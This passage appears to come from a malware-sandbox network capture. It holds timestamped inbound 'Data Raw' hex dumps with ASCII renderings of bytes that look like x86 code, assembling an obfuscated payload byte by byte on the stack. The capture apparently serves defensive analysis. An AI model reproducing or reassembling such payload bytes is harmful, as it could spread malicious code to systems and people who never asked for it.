8b d3 f8 ff 29 c6 85 8c Data Ascii: hijk>l~mnompqrshtuvwx4yyz{\|}p~x)=)
2022-05-16 08:29:53 UTC	2653	IN	Data Raw: f8 ff a1 c6 85 8d dc f8 ff c6 c6 85 8e dc f8 ff 64 c6 85 8f dc f8 ff 7f c6 85 90 dc f8 ff 74 c6 85 91 dc f8 ff f5 c6 85 92 dc f8 ff 6f c6 85 93 dc f8 ff f6 c6 85 94 dc f8 ff 82 c6 85 95 dc f8 ff 99 c6 85 96 dc f8 ff 3a c6 85 97 dc f8 ff 56 c6 85 98 dc f8 ff 75 c6 85 99 dc f8 ff 71 c6 85 9a dc f8 ff 7b c6 85 9b dc f8 ff 73 c6 85 9c dc f8 ff 62 c6 85 9d dc f8 ff 61 c6 85 9e dc f8 ff 69 c6 85 9f dc f8 ff ac c6 85 a0 dc f8 ff 10 c6 85 a1 dc f8 ff 3a c6 85 a2 dc f8 ff d4 c6 85 a3 dc f8 ff 24 c6 85 a4 dc f8 ff 9b c6 85 a5 dc f8 ff 86 c6 85 a6 dc f8 ff 9f c6 85 a7 dc f8 ff ed c6 85 a8 dc f8 ff 48 c6 85 a9 dc f8 ff 36 c6 85 aa dc f8 ff 09 c6 85 ab dc f8 ff db c6 85 ac dc f8 ff 83 c6 85 ad dc f8 ff 29 c6 85 ae dc f8 ff 31 c6 85 af dc f8 ff ac c6 85 b0 dc f8 ff cf Data Ascii: dto:Vuq{sbai:$H6)1
2022-05-16 08:29:53 UTC	2669	IN	Data Raw: 85 b1 e5 f8 ff 48 c6 85 b2 e5 f8 ff 3b c6 85 b3 e5 f8 ff 01 c6 85 b4 e5 f8 ff 2c c6 85 b5 e5 f8 ff 7d c6 85 b6 e5 f8 ff a1 c6 85 b7 e5 f8 ff ce c6 85 b8 e5 f8 ff 2a c6 85 b9 e5 f8 ff 66 c6 85 ba e5 f8 ff ae c6 85 bb e5 f8 ff df c6 85 bc e5 f8 ff 41 c6 85 bd e5 f8 ff fe c6 85 be e5 f8 ff c5 c6 85 bf e5 f8 ff 2c c6 85 c0 e5 f8 ff 80 c6 85 c1 e5 f8 ff 46 c6 85 c2 e5 f8 ff 3c c6 85 c3 e5 f8 ff 1e c6 85 c4 e5 f8 ff ab c6 85 c5 e5 f8 ff 90 c6 85 c6 e5 f8 ff 7d c6 85 c7 e5 f8 ff f6 c6 85 c8 e5 f8 ff c2 c6 85 c9 e5 f8 ff cc c6 85 ca e5 f8 ff 2d c6 85 cb e5 f8 ff 68 c6 85 cc e5 f8 ff 70 c6 85 cd e5 f8 ff 71 c6 85 ce e5 f8 ff bc c6 85 cf e5 f8 ff d8 c6 85 d0 e5 f8 ff 54 c6 85 d1 e5 f8 ff a5 c6 85 d2 e5 f8 ff e2 c6 85 d3 e5 f8 ff fe c6 85 d4 e5 f8 ff 72 c6 85 d5 e5 Data Ascii: H;,}*fA,F<}-hpqTr
2022-05-16 08:29:53 UTC	2685	IN	Data Raw: ff ab c6 85 d6 ee f8 ff c1 c6 85 d7 ee f8 ff 68 c6 85 d8 ee f8 ff fc c6 85 d9 ee f8 ff 3e c6 85 da ee f8 ff 67 c6 85 db ee f8 ff 5b c6 85 dc ee f8 ff 69 c6 85 dd ee f8 ff 5a c6 85 de ee f8 ff 6c c6 85 df ee f8 ff 5a c6 85 e0 ee f8 ff e0 c6 85 e1 ee f8 ff c1 c6 85 e2 ee f8 ff 9b c6 85 e3 ee f8 ff 27 c6 85 e4 ee f8 ff a7 c6 85 e5 ee f8 ff d0 c6 85 e6 ee f8 ff 7d c6 85 e7 ee f8 ff ac c6 85 e8 ee f8 ff 5e c6 85 e9 ee f8 ff 9c c6 85 ea ee f8 ff 03 c6 85 eb ee f8 ff 3a c6 85 ec ee f8 ff 33 c6 85 ed ee f8 ff 39 c6 85 ee ee f8 ff 85 c6 85 ef ee f8 ff 98 c6 85 f0 ee f8 ff 6e c6 85 f1 ee f8 ff ca c6 85 f2 ee f8 ff 24 c6 85 f3 ee f8 ff f8 c6 85 f4 ee f8 ff 6c c6 85 f5 ee f8 ff 4f c6 85 f6 ee f8 ff 23 c6 85 f7 ee f8 ff 7e c6 85 f8 ee f8 ff 7b c6 85 f9 ee f8 ff 06 c6 Data Ascii: h>g[iZlZ'}^:39n$lO#~{
2022-05-16 08:29:53 UTC	2701	IN	Data Raw: fa f7 f8 ff 28 c6 85 fb f7 f8 ff d2 c6 85 fc f7 f8 ff 6f c6 85 fd f7 f8 ff 7e c6 85 fe f7 f8 ff 24 c6 85 ff f7 f8 ff 85 c6 85 00 f8 f8 ff c9 c6 85 01 f8 f8 ff 67 c6 85 02 f8 f8 ff 68 c6 85 03 f8 f8 ff 9c c6 85 04 f8 f8 ff 3c c6 85 05 f8 f8 ff 5b c6 85 06 f8 f8 ff 4f c6 85 07 f8 f8 ff 09 c6 85 08 f8 f8 ff 63 c6 85 09 f8 f8 ff 7d c6 85 0a f8 f8 ff dc c6 85 0b f8 f8 ff c9 c6 85 0c f8 f8 ff 94 c6 85 0d f8 f8 ff 1b c6 85 0e f8 f8 ff f5 c6 85 0f f8 f8 ff 8b c6 85 10 f8 f8 ff 3d c6 85 11 f8 f8 ff 8b c6 85 12 f8 f8 ff cd c6 85 13 f8 f8 ff 63 c6 85 14 f8 f8 ff 24 c6 85 15 f8 f8 ff 54 c6 85 16 f8 f8 ff 3a c6 85 17 f8 f8 ff 36 c6 85 18 f8 f8 ff b9 c6 85 19 f8 f8 ff ca c6 85 1a f8 f8 ff 29 c6 85 1b f8 f8 ff 8a c6 85 1c f8 f8 ff 03 c6 85 1d f8 f8 ff ab c6 85 1e f8 f8 Data Ascii: (o~$gh<[Oc}=c$T:6)
2022-05-16 08:29:53 UTC	2717	IN	Data Raw: 8e c6 85 1f 01 f9 ff df c6 85 20 01 f9 ff ca c6 85 21 01 f9 ff 9f c6 85 22 01 f9 ff 98 c6 85 23 01 f9 ff ab c6 85 24 01 f9 ff 42 c6 85 25 01 f9 ff f5 c6 85 26 01 f9 ff 41 c6 85 27 01 f9 ff 76 c6 85 28 01 f9 ff 7c c6 85 29 01 f9 ff b9 c6 85 2a 01 f9 ff fe c6 85 2b 01 f9 ff 3c c6 85 2c 01 f9 ff 4c c6 85 2d 01 f9 ff bb c6 85 2e 01 f9 ff 6f c6 85 2f 01 f9 ff 54 c6 85 30 01 f9 ff 3c c6 85 31 01 f9 ff 27 c6 85 32 01 f9 ff 03 c6 85 33 01 f9 ff 72 c6 85 34 01 f9 ff 95 c6 85 35 01 f9 ff 9b c6 85 36 01 f9 ff cf c6 85 37 01 f9 ff 5b c6 85 38 01 f9 ff 94 c6 85 39 01 f9 ff d8 c6 85 3a 01 f9 ff 40 c6 85 3b 01 f9 ff ac c6 85 3c 01 f9 ff 8a c6 85 3d 01 f9 ff 6b c6 85 3e 01 f9 ff 2b c6 85 3f 01 f9 ff 68 c6 85 40 01 f9 ff 3b c6 85 41 01 f9 ff 6d c6 85 42 01 f9 ff 98 c6 85 Data Ascii: !"#$B%&A'v(\|)*+<,L-.o/T0<1'23r4567[89:@;<=k>+?h@;AmB
2022-05-16 08:29:53 UTC	2733	IN	Data Raw: 0a f9 ff fe c6 85 44 0a f9 ff 53 c6 85 45 0a f9 ff 7d c6 85 46 0a f9 ff 09 c6 85 47 0a f9 ff 70 c6 85 48 0a f9 ff aa c6 85 49 0a f9 ff f8 c6 85 4a 0a f9 ff ac c6 85 4b 0a f9 ff 90 c6 85 4c 0a f9 ff be c6 85 4d 0a f9 ff 85 c6 85 4e 0a f9 ff 4a c6 85 4f 0a f9 ff fa c6 85 50 0a f9 ff 09 c6 85 51 0a f9 ff 24 c6 85 52 0a f9 ff 19 c6 85 53 0a f9 ff f9 c6 85 54 0a f9 ff d1 c6 85 55 0a f9 ff 6f c6 85 56 0a f9 ff 42 c6 85 57 0a f9 ff 9c c6 85 58 0a f9 ff 6c c6 85 59 0a f9 ff 5c c6 85 5a 0a f9 ff 0b c6 85 5b 0a f9 ff 1b c6 85 5c 0a f9 ff 08 c6 85 5d 0a f9 ff 29 c6 85 5e 0a f9 ff 8d c6 85 5f 0a f9 ff bc c6 85 60 0a f9 ff ad c6 85 61 0a f9 ff 54 c6 85 62 0a f9 ff d8 c6 85 63 0a f9 ff f6 c6 85 64 0a f9 ff 0b c6 85 65 0a f9 ff a3 c6 85 66 0a f9 ff df c6 85 67 0a f9 ff Data Ascii: DSE}FGpHIJKLMNJOPQ$RSTUoVBWXlY\Z[\])^_`aTbcdefg
2022-05-16 08:29:53 UTC	2749	IN	Data Raw: c6 85 68 13 f9 ff a9 c6 85 69 13 f9 ff e7 c6 85 6a 13 f9 ff 2f c6 85 6b 13 f9 ff d0 c6 85 6c 13 f9 ff 31 c6 85 6d 13 f9 ff ac c6 85 6e 13 f9 ff 6d c6 85 6f 13 f9 ff 3d c6 85 70 13 f9 ff 4b c6 85 71 13 f9 ff 39 c6 85 72 13 f9 ff c0 c6 85 73 13 f9 ff 9f c6 85 74 13 f9 ff e2 c6 85 75 13 f9 ff 98 c6 85 76 13 f9 ff c5 c6 85 77 13 f9 ff b9 c6 85 78 13 f9 ff 7b c6 85 79 13 f9 ff a5 c6 85 7a 13 f9 ff 3d c6 85 7b 13 f9 ff 03 c6 85 7c 13 f9 ff 23 c6 85 7d 13 f9 ff f6 c6 85 7e 13 f9 ff 9b c6 85 7f 13 f9 ff 41 c6 85 80 13 f9 ff 77 c6 85 81 13 f9 ff 89 c6 85 82 13 f9 ff 7c c6 85 83 13 f9 ff 4e c6 85 84 13 f9 ff 3d c6 85 85 13 f9 ff 5b c6 85 86 13 f9 ff 1e c6 85 87 13 f9 ff 7a c6 85 88 13 f9 ff a8 c6 85 89 13 f9 ff 9f c6 85 8a 13 f9 ff b2 c6 85 8b 13 f9 ff 5c c6 85 8c Data Ascii: hij/kl1mnmo=pKq9rstuvwx{yz={\|#}~Aw\|N=[z\
2022-05-16 08:29:53 UTC	2765	IN	Data Raw: f9 ff ed c6 85 8d 1c f9 ff 3e c6 85 8e 1c f9 ff 7e c6 85 8f 1c f9 ff 7d c6 85 90 1c f9 ff 31 c6 85 91 1c f9 ff 48 c6 85 92 1c f9 ff a2 c6 85 93 1c f9 ff 9f c6 85 94 1c f9 ff 7c c6 85 95 1c f9 ff 8b c6 85 96 1c f9 ff 71 c6 85 97 1c f9 ff 8b c6 85 98 1c f9 ff 3f c6 85 99 1c f9 ff 0e c6 85 9a 1c f9 ff 24 c6 85 9b 1c f9 ff 0d c6 85 9c 1c f9 ff c9 c6 85 9d 1c f9 ff d0 c6 85 9e 1c f9 ff df c6 85 9f 1c f9 ff ca c6 85 a0 1c f9 ff 1e c6 85 a1 1c f9 ff da c6 85 a2 1c f9 ff 5b c6 85 a3 1c f9 ff b2 c6 85 a4 1c f9 ff 33 c6 85 a5 1c f9 ff 24 c6 85 a6 1c f9 ff 0d c6 85 a7 1c f9 ff fe c6 85 a8 1c f9 ff 9e c6 85 a9 1c f9 ff 41 c6 85 aa 1c f9 ff 7d c6 85 ab 1c f9 ff c8 c6 85 ac 1c f9 ff 3d c6 85 ad 1c f9 ff 29 c6 85 ae 1c f9 ff 6f c6 85 af 1c f9 ff 54 c6 85 b0 1c f9 ff a9 Data Ascii: >~}1H\|q?$[3$A}=)oT
2022-05-16 08:29:53 UTC	2781	IN	Data Raw: 85 b1 25 f9 ff 5a c6 85 b2 25 f9 ff c5 c6 85 b3 25 f9 ff f8 c6 85 b4 25 f9 ff 42 c6 85 b5 25 f9 ff f6 c6 85 b6 25 f9 ff 86 c6 85 b7 25 f9 ff 10 c6 85 b8 25 f9 ff 23 c6 85 b9 25 f9 ff 72 c6 85 ba 25 f9 ff 7d c6 85 bb 25 f9 ff 39 c6 85 bc 25 f9 ff f8 c6 85 bd 25 f9 ff 9f c6 85 be 25 f9 ff 5a c6 85 bf 25 f9 ff d8 c6 85 c0 25 f9 ff 1b c6 85 c1 25 f9 ff ac c6 85 c2 25 f9 ff 7e c6 85 c3 25 f9 ff 3a c6 85 c4 25 f9 ff 06 c6 85 c5 25 f9 ff 31 c6 85 c6 25 f9 ff d8 c6 85 c7 25 f9 ff 8b c6 85 c8 25 f9 ff de c6 85 c9 25 f9 ff ed c6 85 ca 25 f9 ff cd c6 85 cb 25 f9 ff f6 c6 85 cc 25 f9 ff 7d c6 85 cd 25 f9 ff dc c6 85 ce 25 f9 ff 3a c6 85 cf 25 f9 ff 2b c6 85 d0 25 f9 ff 54 c6 85 d1 25 f9 ff ac c6 85 d2 25 f9 ff bc c6 85 d3 25 f9 ff 3d c6 85 d4 25 f9 ff 77 c6 85 d5 25 Data Ascii: %Z%%%B%%%%#%r%}%9%%%Z%%%%~%:%%1%%%%%%%}%%:%+%T%%%=%w%
2022-05-16 08:29:53 UTC	2797	IN	Data Raw: ff 01 c6 85 d6 2e f9 ff 2c c6 85 d7 2e f9 ff 7d c6 85 d8 2e f9 ff d1 c6 85 d9 2e f9 ff d7 c6 85 da 2e f9 ff bd c6 85 db 2e f9 ff 49 c6 85 dc 2e f9 ff ae c6 85 dd 2e f9 ff df c6 85 de 2e f9 ff 41 c6 85 df 2e f9 ff fe c6 85 e0 2e f9 ff eb c6 85 e1 2e f9 ff 2c c6 85 e2 2e f9 ff 24 c6 85 e3 2e f9 ff 29 c6 85 e4 2e f9 ff 3d c6 85 e5 2e f9 ff 1e c6 85 e6 2e f9 ff ab c6 85 e7 2e f9 ff 90 c6 85 e8 2e f9 ff a5 c6 85 e9 2e f9 ff c0 c6 85 ea 2e f9 ff 77 c6 85 eb 2e f9 ff e3 c6 85 ec 2e f9 ff 2d c6 85 ed 2e f9 ff 68 c6 85 ee 2e f9 ff 70 c6 85 ef 2e f9 ff 71 c6 85 f0 2e f9 ff cf c6 85 f1 2e f9 ff d8 c6 85 f2 2e f9 ff 90 c6 85 f3 2e f9 ff ca c6 85 f4 2e f9 ff e3 c6 85 f5 2e f9 ff fe c6 85 f6 2e f9 ff 72 c6 85 f7 2e f9 ff e0 c6 85 f8 2e f9 ff 08 c6 85 f9 2e f9 ff 68 c6 Data Ascii: .,.}....I...A...,.$.).=......w..-.h.p.q.......r...h
2022-05-16 08:29:53 UTC	2813	IN	Data Raw: fa 37 f9 ff 26 c6 85 fb 37 f9 ff ce c6 85 fc 37 f9 ff 4a c6 85 fd 37 f9 ff 1b c6 85 fe 37 f9 ff 02 c6 85 ff 37 f9 ff 5a c6 85 00 38 f9 ff 03 c6 85 01 38 f9 ff 5a c6 85 02 38 f9 ff f2 c6 85 03 38 f9 ff c1 c6 85 04 38 f9 ff 9b c6 85 05 38 f9 ff 27 c6 85 06 38 f9 ff a7 c6 85 07 38 f9 ff d0 c6 85 08 38 f9 ff 1c c6 85 09 38 f9 ff ac c6 85 0a 38 f9 ff ec c6 85 0b 38 f9 ff 6c c6 85 0c 38 f9 ff 2e c6 85 0d 38 f9 ff 7a c6 85 0e 38 f9 ff 59 c6 85 0f 38 f9 ff 39 c6 85 10 38 f9 ff f2 c6 85 11 38 f9 ff 98 c6 85 12 38 f9 ff 72 c6 85 13 38 f9 ff ca c6 85 14 38 f9 ff 24 c6 85 15 38 f9 ff f8 c6 85 16 38 f9 ff 6c c6 85 17 38 f9 ff 4f c6 85 18 38 f9 ff 42 c6 85 19 38 f9 ff 7e c6 85 1a 38 f9 ff e9 c6 85 1b 38 f9 ff f6 c6 85 1c 38 f9 ff b5 c6 85 1d 38 f9 ff c5 c6 85 1e 38 f9 Data Ascii: 7&77J777Z88Z8888'888888l8.8z8Y89888r88$88l8O8B8~88888
2022-05-16 08:29:53 UTC	2829	IN	Data Raw: 6f c6 85 1f 41 f9 ff 7e c6 85 20 41 f9 ff 51 c6 85 21 41 f9 ff 85 c6 85 22 41 f9 ff b3 c6 85 23 41 f9 ff 67 c6 85 24 41 f9 ff 45 c6 85 25 41 f9 ff 9c c6 85 26 41 f9 ff 49 c6 85 27 41 f9 ff 5b c6 85 28 41 f9 ff 35 c6 85 29 41 f9 ff 09 c6 85 2a 41 f9 ff 4e c6 85 2b 41 f9 ff 7d c6 85 2c 41 f9 ff bf c6 85 2d 41 f9 ff c9 c6 85 2e 41 f9 ff ed c6 85 2f 41 f9 ff 1b c6 85 30 41 f9 ff 87 c6 85 31 41 f9 ff 8b c6 85 32 41 f9 ff 51 c6 85 33 41 f9 ff 8b c6 85 34 41 f9 ff cd c6 85 35 41 f9 ff 63 c6 85 36 41 f9 ff 24 c6 85 37 41 f9 ff 54 c6 85 38 41 f9 ff 4f c6 85 39 41 f9 ff 36 c6 85 3a 41 f9 ff c3 c6 85 3b 41 f9 ff ca c6 85 3c 41 f9 ff 04 c6 85 3d 41 f9 ff 8a c6 85 3e 41 f9 ff 76 c6 85 3f 41 f9 ff ab c6 85 40 41 f9 ff 19 c6 85 41 41 f9 ff 68 c6 85 42 41 f9 ff 20 c6 85 Data Ascii: oA~ AQ!A"A#Ag$AE%A&AI'A[(A5)A*AN+A},A-A.A/A0A1A2AQ3A4A5Ac6A$7AT8AO9A6:A;A<A=A>Av?A@AAAhBA
2022-05-16 08:29:53 UTC	2845	IN	Data Raw: 4a f9 ff 3f c6 85 44 4a f9 ff 2c c6 85 45 4a f9 ff 90 c6 85 46 4a f9 ff e9 c6 85 47 4a f9 ff ca c6 85 48 4a f9 ff 41 c6 85 49 4a f9 ff 76 c6 85 4a 4a f9 ff 2b c6 85 4b 4a f9 ff e9 c6 85 4c 4a f9 ff 66 c6 85 4d 4a f9 ff 67 c6 85 4e 4a f9 ff e6 c6 85 4f 4a f9 ff 84 c6 85 50 4a f9 ff 6f c6 85 51 4a f9 ff 54 c6 85 52 4a f9 ff 68 c6 85 53 4a f9 ff 47 c6 85 54 4a f9 ff 4d c6 85 55 4a f9 ff 0e c6 85 56 4a f9 ff 2e c6 85 57 4a f9 ff a4 c6 85 58 4a f9 ff cf c6 85 59 4a f9 ff 5b c6 85 5a 4a f9 ff d2 c6 85 5b 4a f9 ff 38 c6 85 5c 4a f9 ff 0e c6 85 5d 4a f9 ff 30 c6 85 5e 4a f9 ff 2d c6 85 5f 4a f9 ff 54 c6 85 60 4a f9 ff 2b c6 85 61 4a f9 ff 68 c6 85 62 4a f9 ff 68 c6 85 63 4a f9 ff 8d c6 85 64 4a f9 ff b9 c6 85 65 4a f9 ff 51 c6 85 66 4a f9 ff b4 c6 85 67 4a f9 ff Data Ascii: J?DJ,EJFJGJHJAIJvJJ+KJLJfMJgNJOJPJoQJTRJhSJGTJMUJVJ.WJXJYJ[ZJ[J8\J]J0^J-_JT`J+aJhbJhcJdJeJQfJgJ
2022-05-16 08:29:53 UTC	2861	IN	Data Raw: c6 85 68 53 f9 ff b0 c6 85 69 53 f9 ff 38 c6 85 6a 53 f9 ff 00 c6 85 6b 53 f9 ff 3a c6 85 6c 53 f9 ff a8 c6 85 6d 53 f9 ff 55 c6 85 6e 53 f9 ff 8a c6 85 6f 53 f9 ff bb c6 85 70 53 f9 ff e2 c6 85 71 53 f9 ff cf c6 85 72 53 f9 ff a4 c6 85 73 53 f9 ff 65 c6 85 74 53 f9 ff 64 c6 85 75 53 f9 ff 3e c6 85 76 53 f9 ff 8f c6 85 77 53 f9 ff 51 c6 85 78 53 f9 ff 69 c6 85 79 53 f9 ff a7 c6 85 7a 53 f9 ff 2a c6 85 7b 53 f9 ff 09 c6 85 7c 53 f9 ff f5 c6 85 7d 53 f9 ff bf c6 85 7e 53 f9 ff 4b c6 85 7f 53 f9 ff 14 c6 85 80 53 f9 ff e3 c6 85 81 53 f9 ff 60 c6 85 82 53 f9 ff dd c6 85 83 53 f9 ff 57 c6 85 84 53 f9 ff fc c6 85 85 53 f9 ff 0c c6 85 86 53 f9 ff 1a c6 85 87 53 f9 ff 9d c6 85 88 53 f9 ff 2b c6 85 89 53 f9 ff e0 c6 85 8a 53 f9 ff 93 c6 85 8b 53 f9 ff 21 c6 85 8c Data Ascii: hSiS8jSkS:lSmSUnSoSpSqSrSsSetSduS>vSwSQxSiySzS*{S\|S}S~SKSSS`SSWSSSSS+SSS!
2022-05-16 08:29:53 UTC	2877	IN	Data Raw: f9 ff 3f c6 85 8d 5c f9 ff c0 c6 85 8e 5c f9 ff c1 c6 85 8f 5c f9 ff 93 c6 85 90 5c f9 ff ed c6 85 91 5c f9 ff 3d c6 85 92 5c f9 ff 02 c6 85 93 5c f9 ff 21 c6 85 94 5c f9 ff c5 c6 85 95 5c f9 ff d7 c6 85 96 5c f9 ff 13 c6 85 97 5c f9 ff a7 c6 85 98 5c f9 ff c5 c6 85 99 5c f9 ff b9 c6 85 9a 5c f9 ff 7d c6 85 9b 5c f9 ff a1 c6 85 9c 5c f9 ff 3d c6 85 9d 5c f9 ff 03 c6 85 9e 5c f9 ff d3 c6 85 9f 5c f9 ff c9 c6 85 a0 5c f9 ff 9b c6 85 a1 5c f9 ff 41 c6 85 a2 5c f9 ff 2f c6 85 a3 5c f9 ff 93 c6 85 a4 5c f9 ff 7d c6 85 a5 5c f9 ff 0e c6 85 a6 5c f9 ff 3c c6 85 a7 5c f9 ff 5b c6 85 a8 5c f9 ff 72 c6 85 a9 5c f9 ff 15 c6 85 aa 5c f9 ff c8 c6 85 ab 5c f9 ff aa c6 85 ac 5c f9 ff 82 c6 85 ad 5c f9 ff 5c c6 85 ae 5c f9 ff fa c6 85 af 5c f9 ff ca c6 85 b0 5c f9 ff 68 Data Ascii: ?\\\\\=\\!\\\\\\\}\\=\\\\\A\/\\}\\<\[\r\\\\\\\\\h
2022-05-16 08:29:53 UTC	2893	IN	Data Raw: 85 b1 65 f9 ff 7d c6 85 b2 65 f9 ff 41 c6 85 b3 65 f9 ff 6b c6 85 b4 65 f9 ff ba c6 85 b5 65 f9 ff cf c6 85 b6 65 f9 ff 75 c6 85 b7 65 f9 ff 8b c6 85 b8 65 f9 ff 61 c6 85 b9 65 f9 ff 59 c6 85 ba 65 f9 ff 32 c6 85 bb 65 f9 ff c2 c6 85 bc 65 f9 ff 2e c6 85 bd 65 f9 ff ed c6 85 be 65 f9 ff c1 c6 85 bf 65 f9 ff 00 c6 85 c0 65 f9 ff d9 c6 85 c1 65 f9 ff 0a c6 85 c2 65 f9 ff 9a c6 85 c3 65 f9 ff 89 c6 85 c4 65 f9 ff 59 c6 85 c5 65 f9 ff 92 c6 85 c6 65 f9 ff 30 c6 85 c7 65 f9 ff 14 c6 85 c8 65 f9 ff 7d c6 85 c9 65 f9 ff e4 c6 85 ca 65 f9 ff 94 c6 85 cb 65 f9 ff 7d c6 85 cc 65 f9 ff 7f c6 85 cd 65 f9 ff c8 c6 85 ce 65 f9 ff 3d c6 85 cf 65 f9 ff 29 c6 85 d0 65 f9 ff ee c6 85 d1 65 f9 ff 16 c6 85 d2 65 f9 ff 39 c6 85 d3 65 f9 ff 54 c6 85 d4 65 f9 ff 01 c6 85 d5 65 Data Ascii: e}eAekeeeueeaeYe2ee.eeeeeeeeYee0ee}eee}eee=e)eee9eTee
2022-05-16 08:29:53 UTC	2909	IN	Data Raw: ff ac c6 85 d6 6e f9 ff 61 c6 85 d7 6e f9 ff f6 c6 85 d8 6e f9 ff dd c6 85 d9 6e f9 ff 24 c6 85 da 6e f9 ff 7b c6 85 db 6e f9 ff 72 c6 85 dc 6e f9 ff 6a c6 85 dd 6e f9 ff 6b c6 85 de 6e f9 ff eb c6 85 df 6e f9 ff 6f c6 85 e0 6e f9 ff 4b c6 85 e1 6e f9 ff 38 c6 85 e2 6e f9 ff 71 c6 85 e3 6e f9 ff 7c c6 85 e4 6e f9 ff 1d c6 85 e5 6e f9 ff fa c6 85 e6 6e f9 ff 20 c6 85 e7 6e f9 ff 41 c6 85 e8 6e f9 ff 9a c6 85 e9 6e f9 ff 82 c6 85 ea 6e f9 ff 9e c6 85 eb 6e f9 ff ed c6 85 ec 6e f9 ff c4 c6 85 ed 6e f9 ff b4 c6 85 ee 6e f9 ff 7d c6 85 ef 6e f9 ff dc c6 85 f0 6e f9 ff 3b c6 85 f1 6e f9 ff 3b c6 85 f2 6e f9 ff 37 c6 85 f3 6e f9 ff ac c6 85 f4 6e f9 ff df c6 85 f5 6e f9 ff 59 c6 85 f6 6e f9 ff 53 c6 85 f7 6e f9 ff 9b c6 85 f8 6e f9 ff 22 c6 85 f9 6e f9 ff 3a c6 Data Ascii: nannn$n{nrnjnknnonKn8nqn\|nnn nAnnnnnnn}nn;n;n7nnnYnSnn"n:
2022-05-16 08:29:53 UTC	2925	IN	Data Raw: fa 77 f9 ff d5 c6 85 fb 77 f9 ff 9e c6 85 fc 77 f9 ff ce c6 85 fd 77 f9 ff 66 c6 85 fe 77 f9 ff cc c6 85 ff 77 f9 ff ba c6 85 00 78 f9 ff 32 c6 85 01 78 f9 ff 8d c6 85 02 78 f9 ff 8d c6 85 03 78 f9 ff 49 c6 85 04 78 f9 ff 45 c6 85 05 78 f9 ff 59 c6 85 06 78 f9 ff 3d c6 85 07 78 f9 ff 1e c6 85 08 78 f9 ff c7 c6 85 09 78 f9 ff 93 c6 85 0a 78 f9 ff 35 c6 85 0b 78 f9 ff 93 c6 85 0c 78 f9 ff 17 c6 85 0d 78 f9 ff d3 c6 85 0e 78 f9 ff 7f c6 85 0f 78 f9 ff 01 c6 85 10 78 f9 ff 0a c6 85 11 78 f9 ff 14 c6 85 12 78 f9 ff bc c6 85 13 78 f9 ff d8 c6 85 14 78 f9 ff fa c6 85 15 78 f9 ff c9 c6 85 16 78 f9 ff ab c6 85 17 78 f9 ff 9b c6 85 18 78 f9 ff 13 c6 85 19 78 f9 ff 90 c6 85 1a 78 f9 ff 3a c6 85 1b 78 f9 ff 15 c6 85 1c 78 f9 ff 30 c6 85 1d 78 f9 ff e7 c6 85 1e 78 f9 Data Ascii: wwwwfwwx2xxxIxExYx=xxxx5xxxxxxxxxxxxxxxx:xx0xx
2022-05-16 08:29:53 UTC	2941	IN	Data Raw: 67 c6 85 1f 81 f9 ff 1b c6 85 20 81 f9 ff 68 c6 85 21 81 f9 ff 5a c6 85 22 81 f9 ff 6c c6 85 23 81 f9 ff 5a c6 85 24 81 f9 ff f2 c6 85 25 81 f9 ff c1 c6 85 26 81 f9 ff 9b c6 85 27 81 f9 ff 27 c6 85 28 81 f9 ff a7 c6 85 29 81 f9 ff d0 c6 85 2a 81 f9 ff 7d c6 85 2b 81 f9 ff ac c6 85 2c 81 f9 ff 9e c6 85 2d 81 f9 ff 6c c6 85 2e 81 f9 ff 03 c6 85 2f 81 f9 ff 7a c6 85 30 81 f9 ff 32 c6 85 31 81 f9 ff 39 c6 85 32 81 f9 ff 85 c6 85 33 81 f9 ff 98 c6 85 34 81 f9 ff 72 c6 85 35 81 f9 ff ca c6 85 36 81 f9 ff 24 c6 85 37 81 f9 ff f8 c6 85 38 81 f9 ff 6c c6 85 39 81 f9 ff 4f c6 85 3a 81 f9 ff 23 c6 85 3b 81 f9 ff 7e c6 85 3c 81 f9 ff 9b c6 85 3d 81 f9 ff f6 c6 85 3e 81 f9 ff 98 c6 85 3f 81 f9 ff c5 c6 85 40 81 f9 ff df c6 85 41 81 f9 ff ac c6 85 42 81 f9 ff 29 c6 85 Data Ascii: g h!Z"l#Z$%&''()*}+,-l./z0219234r56$78l9O:#;~<=>?@AB)
2022-05-16 08:29:53 UTC	2957	IN	Data Raw: 8a f9 ff 85 c6 85 44 8a f9 ff 59 c6 85 45 8a f9 ff 05 c6 85 46 8a f9 ff 69 c6 85 47 8a f9 ff 9c c6 85 48 8a f9 ff c8 c6 85 49 8a f9 ff 0f c6 85 4a 8a f9 ff 4f c6 85 4b 8a f9 ff 09 c6 85 4c 8a f9 ff 45 c6 85 4d 8a f9 ff 28 c6 85 4e 8a f9 ff dc c6 85 4f 8a f9 ff c9 c6 85 50 8a f9 ff c4 c6 85 51 8a f9 ff 45 c6 85 52 8a f9 ff f4 c6 85 53 8a f9 ff 8b c6 85 54 8a f9 ff 15 c6 85 55 8a f9 ff de c6 85 56 8a f9 ff cd c6 85 57 8a f9 ff 63 c6 85 58 8a f9 ff 7c c6 85 59 8a f9 ff 01 c6 85 5a 8a f9 ff 3a c6 85 5b 8a f9 ff 36 c6 85 5c 8a f9 ff f1 c6 85 5d 8a f9 ff 94 c6 85 5e 8a f9 ff 28 c6 85 5f 8a f9 ff 8a c6 85 60 8a f9 ff 5b c6 85 61 8a f9 ff fe c6 85 62 8a f9 ff 63 c6 85 63 8a f9 ff 68 c6 85 64 8a f9 ff ca c6 85 65 8a f9 ff 23 c6 85 66 8a f9 ff 94 c6 85 67 8a f9 ff Data Ascii: DYEFiGHIJOKLEM(NOPQERSTUVWcX\|YZ:[6\]^(_`[abcchde#fg
2022-05-16 08:29:53 UTC	2973	IN	Data Raw: c6 85 68 93 f9 ff ab c6 85 69 93 f9 ff ab c6 85 6a 93 f9 ff 40 c6 85 6b 93 f9 ff 76 c6 85 6c 93 f9 ff 7a c6 85 6d 93 f9 ff 60 c6 85 6e 93 f9 ff 9b c6 85 6f 93 f9 ff 3c c6 85 70 93 f9 ff 43 c6 85 71 93 f9 ff 62 c6 85 72 93 f9 ff 6f c6 85 73 93 f9 ff 54 c6 85 74 93 f9 ff e4 c6 85 75 93 f9 ff 79 c6 85 76 93 f9 ff 6a c6 85 77 93 f9 ff 72 c6 85 78 93 f9 ff 8b c6 85 79 93 f9 ff 42 c6 85 7a 93 f9 ff cf c6 85 7b 93 f9 ff 5b c6 85 7c 93 f9 ff 4a c6 85 7d 93 f9 ff 01 c6 85 7e 93 f9 ff 32 c6 85 7f 93 f9 ff ac c6 85 80 93 f9 ff 6f c6 85 81 93 f9 ff 35 c6 85 82 93 f9 ff 2a c6 85 83 93 f9 ff 68 c6 85 84 93 f9 ff f0 c6 85 85 93 f9 ff b4 c6 85 86 93 f9 ff f9 c6 85 